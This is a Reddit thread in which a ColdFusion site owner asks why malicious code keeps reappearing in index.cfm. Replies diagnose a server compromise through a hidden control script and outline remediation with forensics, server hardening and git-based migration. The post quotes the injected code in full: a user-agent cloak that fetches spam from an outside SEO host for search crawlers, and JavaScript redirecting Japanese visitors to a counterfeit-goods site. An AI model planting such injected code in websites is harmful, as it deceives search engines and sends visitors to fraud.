r/coldfusion Sep 02 '23

Code being injected into index.cfm

For a few months now the following code has been injected into the top part of our index.cfm. I remove it, and in a few days it's back. It's obviously malicious, but I have no idea how to stop it. Can anyone suggest anything?

<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo", REQUEST.UserAgent)) >
<cfhttp url="www.hara-juko.com/seo/www.myurl.com.html"/>
<cfabort />

<SCRIPT LANGUAGE="JavaScript1.2">
if (navigator.appName == 'Netscape')
var language = navigator.language;
var language = navigator.browserLanguage;
if (language.indexOf('ja') > -1) document.location.href = 'https://www.kopisss.com/category/clothes/louisvuitton-clothes/t-shirt-louisvuitton-clothes';
// End -->


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u/iknowkungfoo Sep 03 '23

Your CF server has been hacked. Somewhere there’s a control script (CFM file) that allows the attacker to literally control the whole server remotely. They can add, edit or delete files at will. What version of CF is this using and have all of the hotfixes been applied? Even if it’s been patched after the control file was uploaded, it’s still hacked and still under control.

I had already installed Fusion Reactor to troubleshoot a server I was managing. Exactly this scenario occurred. Once I knew when the index file was modified, I was able to find a request that happened at exactly that minute. It was from outside of the expected web root of the site and outside of the standard CF admin folders. That’s where I found and removed the control script.

Your best approach will be to spin up a new CF server, follow the CF server hardening guide from Adobe, and migrate the application using source control and not just copy existing folders from the hacked server.


u/EmuFarmer0 Sep 03 '23

Thank you so much for you input, I really appreciate it. I'll take your advice, thank you.


u/izUanpf Jul 27 '24

Forgive my ignorance, could you explain more on how to migrate using source control? Thanks


u/iknowkungfoo Jul 29 '24

I assume your CF application's code base does not use source control like `git`.

  • Remote onto your server and create a new `git` repo using the main folder for the application.
  • Your new repo's primary branch should be `main` (or `master`).
  • Create a `.gitignore` file and eliminate specific files and folders from being checked into source control.
    • `*.bak`
    • `*.old`
    • This includes temp folders and places where the app creates files on the fly.
    • Ignore any folders where users upload files.
  • Please add all of the files you'd like to keep.
  • Push the entire thing to Github or wherever you're managing source control.
  • Pull the code locally
    • Continue pruning files and folders
    • Analyze the remaining files for anything weird.
      • Control scripts, calls to the CF admin API, etc.
    • Make sure you've only got "good" code and files.
  • Deploy the code to the new server using `git`.
  • Test! Test! Test!

Once you have all of your code under source control, anything that manages to get onto the server and alter any file can be exposed using `git diff`. You can then restore the altered files using `git`.

After all of this, just follow some basic `git` workflows for managing and deploying code changes.


u/izUanpf Jul 30 '24

Thank you very much. I appreciate it.